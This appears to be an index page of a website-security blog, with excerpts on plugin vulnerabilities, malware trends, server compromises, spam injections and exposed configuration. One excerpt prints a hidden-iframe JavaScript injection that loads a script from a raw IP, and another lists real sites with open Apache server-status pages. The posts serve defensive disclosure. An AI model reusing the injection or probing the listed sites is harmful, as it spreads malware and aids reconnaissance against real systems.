Update WP Super Cache and W3TC Immediately – Remote Code Execution Vulnerability Disclosed

April 23, 2013 by 47 Comments

Shame on us for not catching this a month ago when it was first reported, but it seems that two of the biggest caching plugins in WordPress have what we would classify a very serious vulnerability – remote code execution (RCE), a.k.a., arbitrary code execution:

…arbitrary code execution is used to describe an attacker’s ability to execute any commands of the attacker’s choice on a target machine or in a target process. – Wikipedia

It appears that a user by the name of kisscsaby first disclosed the issue a month ago via the WordPress forums. As of 5 days ago both plugin authors have pushed new versions of their plugins disabling the vulnerable functions by default. The real concern however is the seriousness of the vulnerability and the shear volume of users between both plugins.

There are a few posts, released within the past few hours that do a great job of explaining what the issue was and what was being exploited. You can find some good after action thoughts on Frank Goosens’ blog and on Acunetix’s blog as well.

Why Such a Big Deal?


Read More

Filed Under: awareness, security, sucuri, vulnerability, WordPress Tagged With: , , , , ,

2012 Web Malware Trends Report Summary

March 7, 2013 by 4 Comments

Sucuri is a website security company focused on the detection and remediation of web malware. In 2012, via our SiteCheck scanner, we scanned 9,953,729 unique domains. This small report is based on the data we were able to compile from that platform and our analysis of that same data.

2012 Web Malware Trend Report Summary

The Foundation

Healthy Website View

We consider a site to be healthy when we cannot identify any unauthorized modification of its content. If any type of malware including injections, SPAM, defacements, etc. are found on a site, or if it is blacklisted by any major security company or search engine, we consider it to be compromised. Based on this view, only 74% of the sites we scan were deemed to be healthy. All the others were either blacklisted or had some malicious injection on them.

  • Total unique domains scanned and analyzed: 9,953,729
  • Sites in which a malicious injection was identified: 15%
  • Sites in which a malicious injection was identified and it was also blacklisted: 4%
  • Sites that were only blacklisted: 7%

Note that the 15% represents unique domains that were classified malicious only by our scanner via our detection mechanism. The blacklisted percentage is based on data made available by the following blacklist API’s:

  • Google
  • McAfee
  • Yandex
  • Norton
  • PhishTank


Read More

Filed Under: Malware, report, research, sucuri Tagged With: , , , ,

Web Server Compromise – Debian Distro – Identify and Remove Corrupt Apache Modules

February 6, 2013 by 6 Comments

Came across another server compromise this week. Client was complaining that the following kept being injected into their JavaScript files:

document.write("<style.vb4brk { position:absolute; left:-1655px; top:-1476px} </style> 
<div class="vb4rk"><iframe 
src="httx:// 149.47.154.253/fee1f3119b234cb79f953e92281b12af/q.php" width="231" height="330">
</iframe></div>'); /*!

Fortunately, the client was working off a VPS. Doing so allowed us to dig deeper into the server and better address the issue. Looking at the server we quickly realized that a bad module had been injected. Unfortunately, because this was a Debian distribution, as such you can’t run the commands we provided in our last post.

Read More

Filed Under: apache, awareness, malware cleanup, plesk, Server Compromise, sucuri Tagged With: , , , ,

Website Malware – Drupal Injections Targeting Cookies

December 19, 2012 by 3 Comments

Many folks are unfamiliar with the Drupal CMS, it doesn’t enjoy the popularity that some others do like WordPress and Joomla, but its a powerful CMS none the less. What it does have in common with its counterparts is that its susceptible to attacks and infections. We don’t often write about it, but we do work on the platform. We decided to give it some attention this week because of the increased number of Drupal infections we’re seeing.

They’re slightly different when compared to other CMS applications and so is the remediation process. In this post we’ll show an infection that seems to be all the craze this week, findings courtesy of Fioravante Souza – one of Sr Malware Engineers.

The Payload

Most of the sites infected with this payload are also accompanied by other iframe injections. Those iframe injections are not special, they are often attached to every file – PHP, JS, HTML, and beging with document.write and reference some file like cgi?5 or cfg?11. If you have some terminal sense you should be able to find them and remove them, if you need help you can always use our free scanner, it’ll display any payloads hitting the readers browser. Here is the payload though that we were most interested in as it was obfuscated and very painful to find and remove.

Read More

Filed Under: Drupal, Malware, malware cleanup, research, security, sucuri Tagged With: , , , , , ,

Website Malware – Sharp Increase in SPAM Attacks – WordPress & Joomla

December 14, 2012 by 12 Comments

This past week we have seen a sharp increase in the use of old tactics designed to poison your search engine results – also known as Search Engine Poisoning (SEP) attacks. If you use our free scanner, SiteCheck, you’ll likely see something like the following:

Sucuri - ViewState Infection

You’re probably wondering, what the heck, how is that SEO SPAM? Allow me to explain what this is doing.

Read More

Filed Under: awareness, joomla, Malware, malware cleanup, research, security, Spam, sucuri, WordPress Tagged With: , , , , ,

Website Malware – Reality of Cross-Site Contaminations

December 13, 2012 by 4 Comments

Sometimes you can’t help but put yourself in the shoes of your clients and skeptics and wonder how many times they roll their eyes at the things you says. Cross-site contamination is one of those things.

We first start writing about it in March of 2013 in a little post that got a lot of attention, “A Little Tale About Website Cross Contamination”. In that case we talked to how the attack vector was coming from a neighboring site that had since been neglected, in turn it was now housing the generating payload that was affecting the live sites. All in all, it was a sad and depressing story.

In this case, it’s unique in that it’d fall into what we would categorize a targeted attack. That’s right, the complete opposite of what we often tell most readers they fall into, opportunistic attacks. I will caveat that it’s not known for sure, but after reading this we’ll let you be the judge.

/* It’s nothing personal, it’s just business */


Read More

Filed Under: hacked, Malware, research, Spam, sucuri Tagged With: , , , ,

SFTP/FTP Password Exposure via sftp-config.json

November 23, 2012 by 3 Comments

Have you heard of the file sftp-config.json? You haven’t? Neither did we until a few weeks ago.

It is used by some SFTP/FTP clients (Sublime SFTP is one) to pre-configure SFTP/FTP connections to remote sites and it contains some useful information in there (not encrypted):

“type”: “ftp”,
..
“host”: “FTP HOST”,
“user”: “FTP USER”,
“password”: “FTP PASS”,
“port”: “21″,

Which makes a lot easier to connect and manage remote servers. However, with extra flexibility comes some serious security issues if not used properly.

Read More

Filed Under: research, vulnerability Tagged With: ,

Website Malware – SEP Attack – SPAM Link Farm

November 21, 2012 by 3 Comments

How appropriate that less than a few hours from my last post talking about Search Engine Poisoning (SEP) attacks I come across a case that aims to land the sites visitors on a spam link farm.

This is not an earth shattering post; it’s just a fun little write-up showing you some of the things we do for fun.

Synopsis

Client was complaining that their site wasn’t rendering on the browser.

Note: When a site doesn’t render on the browser performing remediation via the URI can be exceptionally difficult. When in doubt turn to your friend CURL to see what’s going on. You can also enable NoScript on your browser and it’ll show you what JavaScript is trying to run.

Read More

Filed Under: Spam, sucuri Tagged With: , , , ,

Out-of-date Software Affects Websites Big and Small

November 5, 2012 by 3 Comments

Last week we published an article listing some big and popular websites that were leaking information about their users via the Apache server-status page. We also published a full list of sites that had this option enabled on our Labs project: URLFind.org.

On URLFind, we list a lot more details than just the sites that have server-status enabled. You can easily find sites that are running outdated versions of WordPress, Joomla or even vBulletin. We also index sites that are still running PHP 4 (outdated and not supported) and other potentially unsafe configurations and servers.

Message to all webmasters

After we published the blog post with the server-status issue, almost all of the sites got fixed (well, excluding Staples and Ford), which I don’t think they would have without that small push (walk of shame).

We are hoping that by shedding a bit more light to this already publicly exposed dilemma, webmasters will take note and update their sites and servers as soon as they can.

Read More

Filed Under: apache, iis, research, sucuri, vulnerability, WordPress Tagged With: , , , , ,

Popular sites with Apache server-status enabled

October 30, 2012 by 43 Comments

Apache has a very useful functionality called server-status that allows administrators to easily find how well their servers are performing.

It is basically an HTML page that displays the number of process working, status of each request, IP addresses that are visiting the site, pages that are being queried and things like that. All good.

However, this feature can also have security implications if you leave it wide open to the world. Anyone would be able to see who is visiting the site, the URLs, and some times even find hidden (obscure) admin panels or files that should not be visible to the outside.

Talk about an awkward moment.

URL mapping and server status

We started a small crawling project in our Labs that queried over 10m different web sites (some of the crawl data is at URLfind.org). And we noticed something very interesting: Lots of web sites (some big ones) keep their server-status page open the whole world.

Here are just a few popular brands showing their status:

http://php.net/server-status/
http://metacafe.com/server-status/
http://cloudflare.com/server-status/ (FIXED)
http://disney.go.com/server-status/ (FIXED)
http://www.latimes.com/server-status/
http://www.staples.com/server-status/
http://tweetdeck.com/server-status/ (FIXED)
http://www.nba.com/server-status/
http://www.ford.com/server-status/
http://www.cisco.com/server-status/
http://www.chicagotribune.com/server-status/
http://www.yellow.com/server-status/
http://apache.org/server-status/

And many many more here: http://urlfind.org/?server-status.

Is that a big deal that I can go to staples.com/server-status/ and see all those orders/connections being made and their IPs? Or go to one of them and search for “admin-p” and find a mostly unprotected admin panel (I won’t disclose the site). Or find all the internal URLs and vhost mapping for nba.com or ford.com?

Probably not a big deal by itself (well, if you don’t have an unprotected admin panel), but that can help attackers easily find more information about these environments and use them for more complex attacks.


Simple fix

For server admins, please disable server-status or restrict it to only a set of IP addresses that really need to use it. This link explains how to do so: http://httpd.apache.org/docs/2.2/mod/mod_status.html.

Filed Under: apache, research, sucuri Tagged With: , ,
«Older Posts